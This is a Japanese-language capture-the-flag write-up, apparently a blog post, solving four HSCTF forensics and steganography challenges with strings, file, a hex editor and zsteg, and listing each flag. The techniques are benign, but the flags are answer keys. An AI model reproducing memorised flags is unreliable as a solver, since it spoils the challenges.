Keith is watching chickens cross a road in his grandfather’s farm. He once heard from his grandfather that there was something significant about this behavior, but he can’t figure out why. Help Keith discover what the chickens are doing from this seemingly simple behavior. f:id:Yunolay:20190605185054j:plain

jpgが与えられる。
stringsでフラグが得られた。

$ strings hsctf-chicken_crossing.jpg | grep hs
hsctf{2_get_2_the_other_side}

FLAG : hsctf{2_get_2_the_other_side}

Cool Image

My friend told me he found a really cool image, but I couldn't open it. Can you help me access the image?

cool.pdf

cool.pdfが与えられる。

$ file cool.pdf 
cool.pdf: PNG image data, 1326 x 89, 8-bit/color RGBA, non-interlaced

普通にpng

f:id:Yunolay:20190605185559p:plain

FLAG : hsctf{who_uses_extensions_anyways}

Cool Image 2

My friend sent me this image, but I can't open it. Can you help me open the image?

cool.png

png?が与えられる。
とりあえずバイナリエディタで中身を見た。

f:id:Yunolay:20190605213857p:plain

PNGシグネチャ(89 50 4E 47 0D 0A 1A 0A)の前にI found this cool file. Its really cool!の文字列が埋め込まれている。
ので取り除く

f:id:Yunolay:20190605214041p:plain

$ file cool.png 
cool.png: PNG image data, 1206 x 89, 8-bit/color RGBA, non-interlaced

f:id:Yunolay:20190605214126p:plain

FLAG : hsctf{sorry_about_the_extra_bytes}

Logo Sucks Bad

This logo sucks bad.

logo.png
f:id:Yunolay:20190605214259p:plain

pngが与えられる。
とりあえずstego-toolkitのcheck_png.shで見てみた。

https://github.com/DominicBreuker/stego-toolkit

(snip)

###########################
########## zsteg ##########
###########################

Watch out for red output. This tool shows lots of false positives...
b1,r,lsb,xy         .. 
b1,r,msb,xy         .. text: "NHzjjVhzXHh"
b1,g,lsb,xy         .. 
b1,g,msb,xy         .. 
b1,b,lsb,xy         .. 
b1,b,msb,xy         .. 
b1,a,lsb,xy         .. 
b1,a,msb,xy         .. 
b1,rgb,lsb,xy       .. text: "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis non velit rutrum, porttitor est a, porttitor nisi. Aliquam placerat nibh ut diam faucibus, ut auctor felis sodales. Suspendisse egestas tempus libero, efficitur finibus orci congue sit amet. Sed"
b1,rgb,msb,xy       .. 
b1,bgr,lsb,xy       .. 
b1,bgr,msb,xy       .. 
b1,rgba,lsb,xy      .. 
b1,rgba,msb,xy      .. 
b1,abgr,lsb,xy      .. 
b1,abgr,msb,xy      .. 
b2,r,lsb,xy         .. 
b2,r,msb,xy         .. 
b2,g,lsb,xy         .. text: "Q@E@A@A@E"
b2,g,msb,xy         .. 
b2,b,lsb,xy         .. 
b2,b,msb,xy         .. 
b2,a,lsb,xy         .. 
b2,a,msb,xy         .. 
b2,rgb,lsb,xy       .. 
b2,rgb,msb,xy       .. 
b2,bgr,lsb,xy       .. 
b2,bgr,msb,xy       .. 
b2,rgba,lsb,xy      .. 
b2,rgba,msb,xy      .. 
b2,abgr,lsb,xy      .. 
b2,abgr,msb,xy      .. 
b3,r,lsb,xy         .. 
b3,r,msb,xy         .. 
b3,g,lsb,xy         .. 
b3,g,msb,xy         .. 
b3,b,lsb,xy         .. 
b3,b,msb,xy         .. 
b3,a,lsb,xy         .. 
b3,a,msb,xy         .. 
b3,rgb,lsb,xy       .. 
b3,rgb,msb,xy       .. 
b3,bgr,lsb,xy       .. 
b3,bgr,msb,xy       .. 

(snip)

b1,rgb,lsb,xyに文字列がある。
青い空を見上げればいつもそこに白い猫のステガノグラフィ解析でビットを抽出する。(stegsolveより手軽に使える環境にあった)

f:id:Yunolay:20190605223335p:plain

FLAG : hsctf{th4_l3est_s3gnific3nt_bbbbbbbbbbbbb}